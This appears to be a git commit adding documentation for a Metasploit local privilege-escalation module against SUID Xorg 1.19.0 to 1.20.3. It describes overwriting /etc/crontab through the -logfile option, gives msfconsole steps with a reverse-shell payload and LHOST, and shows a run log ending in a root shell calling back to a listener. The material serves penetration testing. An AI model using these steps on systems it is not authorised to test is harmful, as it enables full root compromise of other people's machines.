Initial documentation for Xorg Privesc Module

killed white spaces
GSoC/Meterpreter_Web_Console
Aaron Ringo 2018-11-12 15:41:17 -06:00
parent ef7fc783be
commit 538055c406
2 changed files with 89 additions and 3 deletions

View File

@ -0,0 +1,86 @@
## Description
This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This flaw allows users to write over existing files on the system. This exploit backs up crontab and then uses -logfile to overwrite it. A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.
## Vulnerable Application
Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.
Xorg is more restrictive to exploit under CentOS. The user must have console lock and SeLinux may interfere.
This module has been tested successfully on:
* OpenBSD 6.3
* OpenBSD 6.4
* CentOS 7.5.1084 x86_64
## Verification Steps
On CentOS your session must have console lock. To get a console lock you can login locally with a user.
1. Start `msfconsole`
2. Get a session
3. Do: `use exploit/multi/local/xorg_x11_suid_server`
4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)
5. Do: `set SESSION [SESSION]`
6. Do: `set LHOST [LHOST]`
7. Do: `run`
8. You should get a new *root* session
## Options
**SESSION**
Which session to use, which can be viewed with `sessions`
## Advanced Options
**Xdisplay**
Display to use for Xorg (default: `:1`)
**WritableDir**
A writable directory file system path. (default: `/tmp`)
## Scenarios
```
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse double SSL handler on 172.30.0.2:4444
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo t2XWfcWkZHevLPS8;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "t2XWfcWkZHevLPS8\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (172.30.0.2:4444 -> 172.30.0.99:41253) at 2018-11-12 15:06:39 -0600
[+] Returning session after cleaning
[+] Deleted /tmp/.session-odRjfx
id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
```